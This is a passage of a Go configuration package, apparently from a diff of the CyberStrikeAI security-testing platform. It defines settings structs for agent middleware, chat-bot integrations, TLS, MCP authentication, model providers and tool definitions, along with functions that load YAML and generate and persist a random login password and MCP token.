json:"summarization_trigger_ratio,omitempty"` + // SummarizationEmitInternalEvents controls middleware internal event emission (default true). 
+ SummarizationEmitInternalEvents *bool `yaml:"summarization_emit_internal_events,omitempty" json:"summarization_emit_internal_events,omitempty"` + // HistoryInputBudgetRatio 已不影响 Eino:从 last_react 轨迹转 ADK 消息时**不再**按 token 比例裁剪(完整注入)。 + // 字段仍保留,便于旧版 config 不报错;新部署可省略。 + HistoryInputBudgetRatio float64 `yaml:"history_input_budget_ratio,omitempty" json:"history_input_budget_ratio,omitempty"` + // PlanExecuteUserInputBudgetRatio caps planner/replanner/executor userInput prompt budget ratio (default 0.35). + PlanExecuteUserInputBudgetRatio float64 `yaml:"plan_execute_user_input_budget_ratio,omitempty" json:"plan_execute_user_input_budget_ratio,omitempty"` + // PlanExecuteExecutedStepsBudgetRatio caps executed_steps prompt budget ratio (default 0.2). + PlanExecuteExecutedStepsBudgetRatio float64 `yaml:"plan_execute_executed_steps_budget_ratio,omitempty" json:"plan_execute_executed_steps_budget_ratio,omitempty"` + // PlanExecuteMaxStepResultRunes caps each executed step result length for prompt view (default 4000). + PlanExecuteMaxStepResultRunes int `yaml:"plan_execute_max_step_result_runes,omitempty" json:"plan_execute_max_step_result_runes,omitempty"` + // PlanExecuteKeepLastSteps keeps only the tail steps in prompt view (default 8). + PlanExecuteKeepLastSteps int `yaml:"plan_execute_keep_last_steps,omitempty" json:"plan_execute_keep_last_steps,omitempty"` + // CheckpointDir when non-empty enables adk.Runner CheckPointStore (file-backed) for interrupt/resume persistence. + CheckpointDir string `yaml:"checkpoint_dir,omitempty" json:"checkpoint_dir,omitempty"` + // DeepOutputKey passed to deep.Config OutputKey (session final text); empty = off. + DeepOutputKey string `yaml:"deep_output_key,omitempty" json:"deep_output_key,omitempty"` + // DeepModelRetryMaxRetries > 0 enables deep.Config ModelRetryConfig (framework-level chat model retries). 
+ DeepModelRetryMaxRetries int `yaml:"deep_model_retry_max_retries,omitempty" json:"deep_model_retry_max_retries,omitempty"` + // TaskToolDescriptionPrefix when non-empty sets deep.Config TaskToolDescriptionGenerator (sub-agent names appended). + TaskToolDescriptionPrefix string `yaml:"task_tool_description_prefix,omitempty" json:"task_tool_description_prefix,omitempty"` +} + +func (c MultiAgentEinoMiddlewareConfig) SummarizationTriggerRatioEffective() float64 { + v := c.SummarizationTriggerRatio + if v <= 0 { + return 0.8 + } + if v < 0.5 { + return 0.5 + } + if v > 0.95 { + return 0.95 + } + return v +} + +func (c MultiAgentEinoMiddlewareConfig) SummarizationEmitInternalEventsEffective() bool { + if c.SummarizationEmitInternalEvents != nil { + return *c.SummarizationEmitInternalEvents + } + return true +} + +func (c MultiAgentEinoMiddlewareConfig) HistoryInputBudgetRatioEffective() float64 { + v := c.HistoryInputBudgetRatio + if v <= 0 { + return 0.35 + } + if v < 0.15 { + return 0.15 + } + if v > 0.6 { + return 0.6 + } + return v +} + +func (c MultiAgentEinoMiddlewareConfig) PlanExecuteUserInputBudgetRatioEffective() float64 { + v := c.PlanExecuteUserInputBudgetRatio + if v <= 0 { + return 0.35 + } + if v < 0.1 { + return 0.1 + } + if v > 0.6 { + return 0.6 + } + return v +} + +func (c MultiAgentEinoMiddlewareConfig) PlanExecuteExecutedStepsBudgetRatioEffective() float64 { + v := c.PlanExecuteExecutedStepsBudgetRatio + if v <= 0 { + return 0.2 + } + if v < 0.08 { + return 0.08 + } + if v > 0.5 { + return 0.5 + } + return v +} + +func (c MultiAgentEinoMiddlewareConfig) PlanExecuteMaxStepResultRunesEffective() int { + if c.PlanExecuteMaxStepResultRunes > 0 { + return c.PlanExecuteMaxStepResultRunes + } + return 4000 +} + +func (c MultiAgentEinoMiddlewareConfig) PlanExecuteKeepLastStepsEffective() int { + if c.PlanExecuteKeepLastSteps > 0 { + return c.PlanExecuteKeepLastSteps + } + return 8 +} + +func (c MultiAgentEinoMiddlewareConfig) 
ReductionMaxLengthForTruncEffective() int { + if c.ReductionMaxLengthForTrunc > 0 { + return c.ReductionMaxLengthForTrunc + } + return 12000 +} + +func (c MultiAgentEinoMiddlewareConfig) ReductionMaxTokensForClearEffective() int { + if c.ReductionMaxTokensForClear > 0 { + return c.ReductionMaxTokensForClear + } + return 50000 +} + +// MultiAgentEinoSkillsConfig toggles Eino official skill progressive disclosure and host filesystem tools. +type MultiAgentEinoSkillsConfig struct { + // Disable skips skill middleware (and does not attach local FS tools for Deep). + Disable bool `yaml:"disable" json:"disable"` + // FilesystemTools registers read_file/glob/grep/write/edit/execute (eino-ext local backend). Nil/omitted = true. + FilesystemTools *bool `yaml:"filesystem_tools,omitempty" json:"filesystem_tools,omitempty"` + // SkillToolName overrides the default Eino tool name "skill". + SkillToolName string `yaml:"skill_tool_name,omitempty" json:"skill_tool_name,omitempty"` +} + +// EinoSkillFilesystemToolsEffective returns whether Deep/sub-agents should attach local filesystem + streaming shell. +func (c MultiAgentEinoSkillsConfig) EinoSkillFilesystemToolsEffective() bool { + if c.FilesystemTools != nil { + return *c.FilesystemTools + } + return true +} + +// PatchToolCallsEffective returns whether patchtoolcalls middleware should run (default true). 
+func (c MultiAgentEinoMiddlewareConfig) PatchToolCallsEffective() bool { + if c.PatchToolCalls != nil { + return *c.PatchToolCalls + } + return true +} + +// MultiAgentSubConfig 子代理(Eino ChatModelAgent):deep 下由 task 调度;supervisor 下由 transfer 委派;plan_execute 不使用子代理列表。 +type MultiAgentSubConfig struct { + ID string `yaml:"id" json:"id"` + Name string `yaml:"name" json:"name"` + Description string `yaml:"description" json:"description"` + Instruction string `yaml:"instruction" json:"instruction"` + BindRole string `yaml:"bind_role,omitempty" json:"bind_role,omitempty"` // 可选:关联主配置 roles 中的角色名;未配 role_tools 时沿用该角色的 tools + RoleTools []string `yaml:"role_tools" json:"role_tools"` // 与单 Agent 角色工具相同 key;空表示全部工具(bind_role 可补全 tools) + MaxIterations int `yaml:"max_iterations" json:"max_iterations"` + Kind string `yaml:"kind,omitempty" json:"kind,omitempty"` // 仅 Markdown:kind=orchestrator 表示 Deep 主代理(与 orchestrator.md 二选一约定) +} + +// MultiAgentPublic 返回给前端的精简信息(不含子代理指令全文)。 +type MultiAgentPublic struct { + Enabled bool `json:"enabled"` + RobotUseMultiAgent bool `json:"robot_use_multi_agent"` + BatchUseMultiAgent bool `json:"batch_use_multi_agent"` + SubAgentCount int `json:"sub_agent_count"` + Orchestration string `json:"orchestration,omitempty"` + PlanExecuteLoopMaxIterations int `json:"plan_execute_loop_max_iterations"` + ToolSearchAlwaysVisibleTools []string `json:"tool_search_always_visible_tools,omitempty"` + ToolSearchAlwaysVisibleEffectiveTools []string `json:"tool_search_always_visible_effective_tools,omitempty"` +} + +// NormalizeMultiAgentOrchestration 返回 deep、plan_execute 或 supervisor。 +func NormalizeMultiAgentOrchestration(s string) string { + v := strings.TrimSpace(strings.ToLower(s)) + switch v { + case "plan_execute", "plan-execute", "planexecute", "pe": + return "plan_execute" + case "supervisor", "super", "sv": + return "supervisor" + default: + return "deep" + } +} + +// MultiAgentAPIUpdate 设置页/API 仅更新多代理标量字段;写入 YAML 时不覆盖 sub_agents 等块。 +type 
MultiAgentAPIUpdate struct { + Enabled bool `json:"enabled"` + RobotUseMultiAgent bool `json:"robot_use_multi_agent"` + BatchUseMultiAgent bool `json:"batch_use_multi_agent"` + PlanExecuteLoopMaxIterations *int `json:"plan_execute_loop_max_iterations,omitempty"` + // 指针区分「JSON 未传该字段」与「传空数组要清空」;省略时不应覆盖 YAML 中的常驻工具白名单。 + ToolSearchAlwaysVisibleTools *[]string `json:"tool_search_always_visible_tools,omitempty"` +} + +// RobotsConfig 机器人配置(企业微信、钉钉、飞书等) +type RobotsConfig struct { + Session RobotSessionConfig `yaml:"session,omitempty" json:"session,omitempty"` // 机器人会话隔离策略 + Wecom RobotWecomConfig `yaml:"wecom,omitempty" json:"wecom,omitempty"` // 企业微信 + Dingtalk RobotDingtalkConfig `yaml:"dingtalk,omitempty" json:"dingtalk,omitempty"` // 钉钉 + Lark RobotLarkConfig `yaml:"lark,omitempty" json:"lark,omitempty"` // 飞书 +} + +// RobotSessionConfig 机器人会话隔离策略 +type RobotSessionConfig struct { + StrictUserIdentity *bool `yaml:"strict_user_identity,omitempty" json:"strict_user_identity,omitempty"` // true 时只允许真实用户标识,不允许会话/群 ID 兜底 +} + +// StrictUserIdentityEnabled 返回是否启用严格用户身份模式;未配置时默认 true。 +func (c RobotSessionConfig) StrictUserIdentityEnabled() bool { + if c.StrictUserIdentity == nil { + return true + } + return *c.StrictUserIdentity +} + +// RobotWecomConfig 企业微信机器人配置 +type RobotWecomConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + Token string `yaml:"token" json:"token"` // 回调 URL 校验 Token + EncodingAESKey string `yaml:"encoding_aes_key" json:"encoding_aes_key"` // EncodingAESKey + CorpID string `yaml:"corp_id" json:"corp_id"` // 企业 ID + Secret string `yaml:"secret" json:"secret"` // 应用 Secret + AgentID int64 `yaml:"agent_id" json:"agent_id"` // 应用 AgentId +} + +// RobotDingtalkConfig 钉钉机器人配置 +type RobotDingtalkConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + ClientID string `yaml:"client_id" json:"client_id"` // 应用 Key (AppKey) + ClientSecret string `yaml:"client_secret" json:"client_secret"` // 应用 Secret + AllowConversationIDFallback bool 
`yaml:"allow_conversation_id_fallback" json:"allow_conversation_id_fallback"` // sender_id 缺失时是否允许回退到会话 ID +} + +// RobotLarkConfig 飞书机器人配置 +type RobotLarkConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + AppID string `yaml:"app_id" json:"app_id"` // 应用 App ID + AppSecret string `yaml:"app_secret" json:"app_secret"` // 应用 App Secret + VerifyToken string `yaml:"verify_token" json:"verify_token"` // 事件订阅 Verification Token(可选) + AllowChatIDFallback bool `yaml:"allow_chat_id_fallback" json:"allow_chat_id_fallback"` // 用户 ID 缺失时是否允许回退到 chat_id +} + +type ServerConfig struct { + Host string `yaml:"host" json:"host"` + Port int `yaml:"port" json:"port"` + // TLSEnabled 为 true 时主 Web UI 使用 HTTPS;现代浏览器在同源下会协商 HTTP/2,缓解 HTTP/1.1 每源并发连接数限制。 + TLSEnabled bool `yaml:"tls_enabled,omitempty" json:"tls_enabled,omitempty"` + // TLSCertPath / TLSKeyPath 非空时从 PEM 文件加载证书(生产环境推荐)。 + TLSCertPath string `yaml:"tls_cert_path,omitempty" json:"tls_cert_path,omitempty"` + TLSKeyPath string `yaml:"tls_key_path,omitempty" json:"tls_key_path,omitempty"` + // TLSAutoSelfSign 为 true 且未配置有效证书路径时,启动时生成内存自签证书(仅本地/测试;浏览器会提示不受信任)。 + TLSAutoSelfSign bool `yaml:"tls_auto_self_sign,omitempty" json:"tls_auto_self_sign,omitempty"` + // TLSHTTPRedirect 为 false 时禁用 HTTP→HTTPS 跳转;省略或为 true 且已启用 HTTPS 时,明文 HTTP 访问将 308 跳转到 HTTPS(同端口嗅探分流)。 + TLSHTTPRedirect *bool `yaml:"tls_http_redirect,omitempty" json:"tls_http_redirect,omitempty"` +} + +type LogConfig struct { + Level string `yaml:"level"` + Output string `yaml:"output"` +} + +type MCPConfig struct { + Enabled bool `yaml:"enabled"` + Host string `yaml:"host"` + Port int `yaml:"port"` + AuthHeader string `yaml:"auth_header,omitempty"` // 鉴权 header 名,留空表示不鉴权 + AuthHeaderValue string `yaml:"auth_header_value,omitempty"` // 鉴权 header 值,需与请求中该 header 一致 +} + +type OpenAIConfig struct { + Provider string `yaml:"provider,omitempty" json:"provider,omitempty"` // API 提供商: "openai"(默认) 或 "claude",claude 时自动桥接为 Anthropic Messages API + APIKey string 
`yaml:"api_key" json:"api_key"` + BaseURL string `yaml:"base_url" json:"base_url"` + Model string `yaml:"model" json:"model"` + MaxTotalTokens int `yaml:"max_total_tokens,omitempty" json:"max_total_tokens,omitempty"` + // Reasoning 控制 Eino ChatModel 的 thinking / reasoning_effort / output_config 等(仅 Eino 路径生效;原生 ReAct 忽略)。 + Reasoning OpenAIReasoningConfig `yaml:"reasoning,omitempty" json:"reasoning,omitempty"` +} + +// OpenAIReasoningConfig 全局默认与网关 profile(对话页可通过 ChatRequest.reasoning 覆盖,受 AllowClientReasoning 约束)。 +type OpenAIReasoningConfig struct { + // Mode: auto(默认)| on | off | default(与 auto 相同)。off 时不向模型附加推理扩展字段。 + Mode string `yaml:"mode,omitempty" json:"mode,omitempty"` + // Effort: low | medium | high | max;空表示不单独指定强度(各 profile 行为见 internal/reasoning)。 + Effort string `yaml:"effort,omitempty" json:"effort,omitempty"` + // AllowClientReasoning 为 false 时忽略请求体 reasoning;nil 或未设置等同于 true。 + AllowClientReasoning *bool `yaml:"allow_client_reasoning,omitempty" json:"allow_client_reasoning,omitempty"` + // Profile: auto | deepseek_compat | openai_compat | output_config_effort + Profile string `yaml:"profile,omitempty" json:"profile,omitempty"` + // ExtraRequestFields 合并进 Chat Completions 根 JSON(管理员用;与自动字段同名时后者覆盖)。 + ExtraRequestFields map[string]interface{} `yaml:"extra_request_fields,omitempty" json:"extra_request_fields,omitempty"` +} + +// ModeEffective returns auto when empty or default. +func (c OpenAIReasoningConfig) ModeEffective() string { + m := strings.ToLower(strings.TrimSpace(c.Mode)) + if m == "" || m == "default" { + return "auto" + } + return m +} + +// ProfileEffective returns auto when empty. +func (c OpenAIReasoningConfig) ProfileEffective() string { + p := strings.ToLower(strings.TrimSpace(c.Profile)) + if p == "" { + return "auto" + } + return p +} + +// AllowClientReasoningEffective true when client may send ChatRequest.reasoning. 
+func (c OpenAIReasoningConfig) AllowClientReasoningEffective() bool { + if c.AllowClientReasoning == nil { + return true + } + return *c.AllowClientReasoning +} + +type FofaConfig struct { + // Email 为 FOFA 账号邮箱;APIKey 为 FOFA API Key(建议使用只读权限的 Key) + Email string `yaml:"email,omitempty" json:"email,omitempty"` + APIKey string `yaml:"api_key,omitempty" json:"api_key,omitempty"` + BaseURL string `yaml:"base_url,omitempty" json:"base_url,omitempty"` // 默认 https://fofa.info/api/v1/search/all +} + +type SecurityConfig struct { + Tools []ToolConfig `yaml:"tools,omitempty"` // 向后兼容:支持在主配置文件中定义工具 + ToolsDir string `yaml:"tools_dir,omitempty"` // 工具配置文件目录(新方式) + ToolDescriptionMode string `yaml:"tool_description_mode,omitempty"` // 工具描述模式: "short" | "full",默认 short +} + +type DatabaseConfig struct { + Path string `yaml:"path"` // 会话数据库路径 + KnowledgeDBPath string `yaml:"knowledge_db_path,omitempty"` // 知识库数据库路径(可选,为空则使用会话数据库) +} + +type AgentConfig struct { + MaxIterations int `yaml:"max_iterations" json:"max_iterations"` + LargeResultThreshold int `yaml:"large_result_threshold" json:"large_result_threshold"` // 大结果阈值(字节),默认50KB + ResultStorageDir string `yaml:"result_storage_dir" json:"result_storage_dir"` // 结果存储目录,默认tmp + ToolTimeoutMinutes int `yaml:"tool_timeout_minutes" json:"tool_timeout_minutes"` // 单次工具执行最大时长(分钟),超时自动终止,防止长时间挂起;0 表示不限制(不推荐) + // SystemPromptPath 单代理系统提示 Markdown/文本文件路径(相对 config.yaml 所在目录,或可写绝对路径)。非空且可读时替换内置单代理提示;留空用内置。 + SystemPromptPath string `yaml:"system_prompt_path,omitempty" json:"system_prompt_path,omitempty"` +} + +// HitlConfig 人机协同全局选项;与会话侧栏/API 中的白名单合并为并集后参与判定。 +// tool_whitelist 可在侧栏「应用」时合并写入 config.yaml 并立即生效;其他字段若仅改文件仍需重启。 +type HitlConfig struct { + // ToolWhitelist 全局免审批工具名(与每条会话配置的 sensitiveTools 语义相同:白名单内工具不触发 HITL)。 + ToolWhitelist []string `yaml:"tool_whitelist,omitempty" json:"tool_whitelist,omitempty"` +} + +type AuthConfig struct { + Password string `yaml:"password" json:"password"` + SessionDurationHours int 
`yaml:"session_duration_hours" json:"session_duration_hours"` + GeneratedPassword string `yaml:"-" json:"-"` + GeneratedPasswordPersisted bool `yaml:"-" json:"-"` + GeneratedPasswordPersistErr string `yaml:"-" json:"-"` +} + +// ExternalMCPConfig 外部MCP配置 +type ExternalMCPConfig struct { + Servers map[string]ExternalMCPServerConfig `yaml:"servers,omitempty" json:"servers,omitempty"` +} + +// ExternalMCPServerConfig 外部MCP服务器配置(遵循官方 MCP 配置格式,兼容 Claude Desktop / Cursor / VS Code)。 +// 所有字符串字段均支持 ${VAR} 和 ${VAR:-default} 环境变量展开语法。 +type ExternalMCPServerConfig struct { + // 传输类型: "stdio" | "sse" | "http"(Streamable HTTP)。 + // stdio 模式可省略,有 command 字段时自动推断。 + Type string `yaml:"type,omitempty" json:"type,omitempty"` + + // stdio 模式配置 + Command string `yaml:"command,omitempty" json:"command,omitempty"` + Args []string `yaml:"args,omitempty" json:"args,omitempty"` + Env map[string]string `yaml:"env,omitempty" json:"env,omitempty"` + + // HTTP/SSE 模式配置 + URL string `yaml:"url,omitempty" json:"url,omitempty"` + Headers map[string]string `yaml:"headers,omitempty" json:"headers,omitempty"` + + // 官方标准字段 + Disabled bool `yaml:"disabled,omitempty" json:"disabled,omitempty"` // 禁用服务器(官方字段) + AutoApprove []string `yaml:"autoApprove,omitempty" json:"autoApprove,omitempty"` // 自动批准的工具列表(官方字段) + + // SDK 高级配置(对应 MCP Go SDK 传输层参数) + MaxRetries int `yaml:"max_retries,omitempty" json:"max_retries,omitempty"` // Streamable HTTP 断线重连次数(默认 5) + TerminateDuration int `yaml:"terminate_duration,omitempty" json:"terminate_duration,omitempty"` // stdio 进程优雅关闭等待秒数(默认 5) + KeepAlive int `yaml:"keep_alive,omitempty" json:"keep_alive,omitempty"` // 客户端心跳间隔秒数(0 = 禁用) + + // 通用配置 + Description string `yaml:"description,omitempty" json:"description,omitempty"` + Timeout int `yaml:"timeout,omitempty" json:"timeout,omitempty"` // 连接超时(秒) + ExternalMCPEnable bool `yaml:"external_mcp_enable,omitempty" json:"external_mcp_enable,omitempty"` // 是否启用 + ToolEnabled map[string]bool 
`yaml:"tool_enabled,omitempty" json:"tool_enabled,omitempty"` // 每个工具的启用状态 +} + +// GetTransportType 返回实际传输类型。优先读 Type,否则根据 Command/URL 自动推断。 +func (c ExternalMCPServerConfig) GetTransportType() string { + if c.Type != "" { + return c.Type + } + if c.Command != "" { + return "stdio" + } + if c.URL != "" { + return "http" + } + return "" +} + +type ToolConfig struct { + Name string `yaml:"name"` + Command string `yaml:"command"` + Args []string `yaml:"args,omitempty"` // 固定参数(可选) + ShortDescription string `yaml:"short_description,omitempty"` // 简短描述(用于工具列表,减少token消耗) + Description string `yaml:"description"` // 详细描述(用于工具文档) + Enabled bool `yaml:"enabled"` + Parameters []ParameterConfig `yaml:"parameters,omitempty"` // 参数定义(可选) + ArgMapping string `yaml:"arg_mapping,omitempty"` // 参数映射方式: "auto", "manual", "template"(可选) + AllowedExitCodes []int `yaml:"allowed_exit_codes,omitempty"` // 允许的退出码列表(某些工具在成功时也返回非零退出码) +} + +// ParameterConfig 参数配置 +type ParameterConfig struct { + Name string `yaml:"name"` // 参数名称 + Type string `yaml:"type"` // 参数类型: string, int, bool, array + Description string `yaml:"description"` // 参数描述 + Required bool `yaml:"required,omitempty"` // 是否必需 + Default interface{} `yaml:"default,omitempty"` // 默认值 + ItemType string `yaml:"item_type,omitempty"` // 当 type 为 array 时,数组元素类型,如 string, number, object + Flag string `yaml:"flag,omitempty"` // 命令行标志,如 "-u", "--url", "-p" + Position *int `yaml:"position,omitempty"` // 位置参数的位置(从0开始) + Format string `yaml:"format,omitempty"` // 参数格式: "flag", "positional", "combined" (flag=value), "template" + Template string `yaml:"template,omitempty"` // 模板字符串,如 "{flag} {value}" 或 "{value}" + Options []string `yaml:"options,omitempty"` // 可选值列表(用于枚举) +} + +func Load(path string) (*Config, error) { + data, err := os.ReadFile(path) + if err != nil { + return nil, fmt.Errorf("读取配置文件失败: %w", err) + } + + var cfg Config + if err := yaml.Unmarshal(data, &cfg); err != nil { + return nil, fmt.Errorf("解析配置文件失败: %w", err) + } + 
+ if cfg.Auth.SessionDurationHours <= 0 { + cfg.Auth.SessionDurationHours = 12 + } + if strings.TrimSpace(cfg.Auth.Password) == "" { + password, err := generateStrongPassword(24) + if err != nil { + return nil, fmt.Errorf("生成默认密码失败: %w", err) + } + + cfg.Auth.Password = password + cfg.Auth.GeneratedPassword = password + + if err := PersistAuthPassword(path, password); err != nil { + cfg.Auth.GeneratedPasswordPersisted = false + cfg.Auth.GeneratedPasswordPersistErr = err.Error() + } else { + cfg.Auth.GeneratedPasswordPersisted = true + } + } + + // 如果配置了工具目录,从目录加载工具配置 + if cfg.Security.ToolsDir != "" { + configDir := filepath.Dir(path) + toolsDir := cfg.Security.ToolsDir + + // 如果是相对路径,相对于配置文件所在目录 + if !filepath.IsAbs(toolsDir) { + toolsDir = filepath.Join(configDir, toolsDir) + } + + tools, err := LoadToolsFromDir(toolsDir) + if err != nil { + return nil, fmt.Errorf("从工具目录加载工具配置失败: %w", err) + } + + // 合并工具配置:目录中的工具优先,主配置中的工具作为补充 + existingTools := make(map[string]bool) + for _, tool := range tools { + existingTools[tool.Name] = true + } + + // 添加主配置中不存在于目录中的工具(向后兼容) + for _, tool := range cfg.Security.Tools { + if !existingTools[tool.Name] { + tools = append(tools, tool) + } + } + + cfg.Security.Tools = tools + } + + // 外部 MCP:迁移 + 环境变量展开 + if cfg.ExternalMCP.Servers != nil { + for name, serverCfg := range cfg.ExternalMCP.Servers { + // 官方 disabled 字段 → ExternalMCPEnable + if serverCfg.Disabled { + serverCfg.ExternalMCPEnable = false + } else if !serverCfg.ExternalMCPEnable { + // 默认启用 + serverCfg.ExternalMCPEnable = true + } + + // 展开所有 ${VAR} / ${VAR:-default} 环境变量引用 + ExpandConfigEnv(&serverCfg) + + cfg.ExternalMCP.Servers[name] = serverCfg + } + } + + // 从角色目录加载角色配置 + if cfg.RolesDir != "" { + configDir := filepath.Dir(path) + rolesDir := cfg.RolesDir + + // 如果是相对路径,相对于配置文件所在目录 + if !filepath.IsAbs(rolesDir) { + rolesDir = filepath.Join(configDir, rolesDir) + } + + roles, err := LoadRolesFromDir(rolesDir) + if err != nil { + return nil, 
fmt.Errorf("从角色目录加载角色配置失败: %w", err) + } + + cfg.Roles = roles + } else { + // 如果未配置 roles_dir,初始化为空 map + if cfg.Roles == nil { + cfg.Roles = make(map[string]RoleConfig) + } + } + + return &cfg, nil +} + +func generateStrongPassword(length int) (string, error) { + if length <= 0 { + length = 24 + } + + bytesLen := length + randomBytes := make([]byte, bytesLen) + if _, err := rand.Read(randomBytes); err != nil { + return "", err + } + + password := base64.RawURLEncoding.EncodeToString(randomBytes) + if len(password) > length { + password = password[:length] + } + return password, nil +} + +func PersistAuthPassword(path, password string) error { + data, err := os.ReadFile(path) + if err != nil { + return err + } + + lines := strings.Split(string(data), "\n") + inAuthBlock := false + authIndent := -1 + + for i, line := range lines { + trimmed := strings.TrimSpace(line) + if !inAuthBlock { + if strings.HasPrefix(trimmed, "auth:") { + inAuthBlock = true + authIndent = len(line) - len(strings.TrimLeft(line, " ")) + } + continue + } + + if trimmed == "" || strings.HasPrefix(trimmed, "#") { + continue + } + + leadingSpaces := len(line) - len(strings.TrimLeft(line, " ")) + if leadingSpaces <= authIndent { + // 离开 auth 块 + inAuthBlock = false + authIndent = -1 + // 继续寻找其它 auth 块(理论上没有) + if strings.HasPrefix(trimmed, "auth:") { + inAuthBlock = true + authIndent = leadingSpaces + } + continue + } + + if strings.HasPrefix(strings.TrimSpace(line), "password:") { + prefix := line[:len(line)-len(strings.TrimLeft(line, " "))] + comment := "" + if idx := strings.Index(line, "#"); idx >= 0 { + comment = strings.TrimRight(line[idx:], " ") + } + + newLine := fmt.Sprintf("%spassword: %s", prefix, password) + if comment != "" { + if !strings.HasPrefix(comment, " ") { + newLine += " " + } + newLine += comment + } + lines[i] = newLine + break + } + } + + return os.WriteFile(path, []byte(strings.Join(lines, "\n")), 0644) +} + +func PrintGeneratedPasswordWarning(password string, persisted 
bool, persistErr string) { + if strings.TrimSpace(password) == "" { + return + } + + if persisted { + fmt.Println("[CyberStrikeAI] ✅ 已为您自动生成并写入 Web 登录密码。") + } else { + if persistErr != "" { + fmt.Printf("[CyberStrikeAI] ⚠️ 无法自动写入配置文件中的密码: %s\n", persistErr) + } else { + fmt.Println("[CyberStrikeAI] ⚠️ 无法自动写入配置文件中的密码。") + } + fmt.Println("请手动将以下随机密码写入 config.yaml 的 auth.password:") + } + + fmt.Println("----------------------------------------------------------------") + fmt.Println("CyberStrikeAI Auto-Generated Web Password") + fmt.Printf("Password: %s\n", password) + fmt.Println("WARNING: Anyone with this password can fully control CyberStrikeAI.") + fmt.Println("Please store it securely and change it in config.yaml as soon as possible.") + fmt.Println("警告:持有此密码的人将拥有对 CyberStrikeAI 的完全控制权限。") + fmt.Println("请妥善保管,并尽快在 config.yaml 中修改 auth.password!") + fmt.Println("----------------------------------------------------------------") +} + +// generateRandomToken 生成用于 MCP 鉴权的随机字符串(64 位十六进制) +func generateRandomToken() (string, error) { + b := make([]byte, 32) + if _, err := rand.Read(b); err != nil { + return "", err + } + return hex.EncodeToString(b), nil +} + +// persistMCPAuth 将 MCP 的 auth_header / auth_header_value 写回配置文件 +func persistMCPAuth(path string, mcp *MCPConfig) error { + data, err := os.ReadFile(path) + if err != nil { + return err + } + lines := strings.Split(string(data), "\n") + inMcpBlock := false + mcpIndent := -1 + + for i, line := range lines { + trimmed := strings.TrimSpace(line) + if !inMcpBlock { + if strings.HasPrefix(trimmed, "mcp:") { + inMcpBlock = true + mcpIndent = len(line) - len(strings.TrimLeft(line, " ")) + } + continue + } + if trimmed == "" || strings.HasPrefix(trimmed, "#") { + continue + } + leadingSpaces := len(line) - len(strings.TrimLeft(line, " ")) + if leadingSpaces <= mcpIndent { + inMcpBlock = false + mcpIndent = -1 + if strings.HasPrefix(trimmed, "mcp:") { + inMcpBlock = true + mcpIndent = leadingSpaces + } + continue + } 
+ + prefix := line[:leadingSpaces] + rest := strings.TrimSpace(line[leadingSpaces:]) + comment := "" + if idx := strings.Index(line, "#"); idx >= 0 { + comment = strings.TrimRight(line[idx:], " ") + } + withComment := "" + if comment != "" { + if !strings.HasPrefix(comment, " ") { + withComment = " " + } + withComment += comment + } + + if strings.HasPrefix(rest, "auth_header_value:") { + lines[i] = fmt.Sprintf("%sauth_header_value: %q%s", prefix, mcp.AuthHeaderValue, withComment) + } else if strings.HasPrefix(rest, "auth_header:") { + lines[i] = fmt.Sprintf("%sauth_header: %q%s", prefix, mcp.AuthHeader, withComment) + } + } + + return os.WriteFile(path, []byte(strings.Join(lines, "\n")), 0644) +} + +// EnsureMCPAuth 在 MCP 启用且 auth_header_value 为空时,自动生成随机密钥并写回配置 +func EnsureMCPAuth(path string, cfg *Config) error { + if !cfg.MCP.Enabled || strings.TrimSpace(cfg.MCP.AuthHeaderValue) != "" { + return nil + } + token, err := generateRandomToken() + if err != nil { + return fmt.Errorf("生成 MCP 鉴权密钥失败: %w", err) + } + cfg.MCP.AuthHeaderValue = token + if strings.TrimSpace(cfg.MCP.AuthHeader) == "" { + cfg.MCP.AuthHeader = "X-MCP-Token" + } + return persistMCPAuth(path, &cfg.MCP) +} + +// PrintMCPConfigJSON 向终端输出 MCP 配置的 JSON,可直接复制到 Cursor / Claude Code 的 mcp 配置中使用 +func PrintMCPConfigJSON(mcp MCPConfig) { + if !mcp.Enabled { + return + } + hostForURL := strings.TrimSpace(mcp.Host) + if hostForURL == "" || hostForURL == "0.0.0.0" { + hostForURL = "localhost" + } + url := fmt.Sprintf("http://%s:%d/mcp", hostForURL, mcp.Port) + headers := map[string]string{} + if mcp.AuthHeader != "" { + headers[mcp.AuthHeader] = mcp.AuthHeaderValue + } + serverEntry := map[string]interface{}{ + "url": url, + } + if len(headers) > 0 { + serverEntry["headers"] = headers + } + // Claude Code 需要 type: "http" + serverEntry["type"] = "http" + out := map[string]interface{}{ + "mcpServers": map[string]interface{}{ + "cyberstrike-ai": serverEntry, + }, + } + b, _ := json.MarshalIndent(out, "", " ") 
+ fmt.Println("[CyberStrikeAI] MCP 配置(可复制到 Cursor / Claude Code 使用):") + fmt.Println(" Cursor: 放入 ~/.cursor/mcp.json 的 mcpServers,或项目 .cursor/mcp.json") + fmt.Println(" Claude Code: 放入 .mcp.json 或 ~/.claude.json 的 mcpServers") + fmt.Println("----------------------------------------------------------------") + fmt.Println(string(b)) + fmt.Println("----------------------------------------------------------------") +} + +// LoadToolsFromDir 从目录加载所有工具配置文件 +func LoadToolsFromDir(dir string) ([]ToolConfig, error) { + var tools []ToolConfig + + // 检查目录是否存在 + if _, err := os.Stat(dir); os.IsNotExist(err) { + return tools, nil // 目录不存在时返回空列表,不报错 + } + + // 读取目录中的所有 .yaml 和 .yml 文件 + entries, err := os.ReadDir(dir) + if err != nil { + return nil, fmt.Errorf("读取工具目录失败: %w", err) + } + + for _, entry := range entries { + if entry.IsDir() { + continue + } + + name := entry.Name() + if !strings.HasSuffix(name, ".yaml") && !strings.HasSuffix(name, ".yml") { + continue + } + + filePath := filepath.Join(dir, name) + tool, err := LoadToolFromFile(filePath) + if err != nil { + // 记录错误但继续加载其他文件 + fmt.Printf("警告: 加载工具配置文件 %s 失败: %v\n", filePath, err) + continue + } + + tools = append(tools, *tool) + } + + return tools, nil +} + +// LoadToolFromFile 从单个文件加载工具配置 +func LoadToolFromFile(path string) (*ToolConfig, error) { + data, err := os.ReadFile(path) + if err != nil { + return nil, fmt.Errorf("读取文件失败: %w", err) + } + + var tool ToolConfig + if err := yaml.Unmarshal(data, &tool); err != nil { + return nil, fmt.Errorf("解析工具配置失败: %w", err) + } + + // 验证必需字段 + if tool.Name == "" { + return nil, fmt.Errorf("工具名称不能为空") + } + if tool.Command == "" { + return nil, 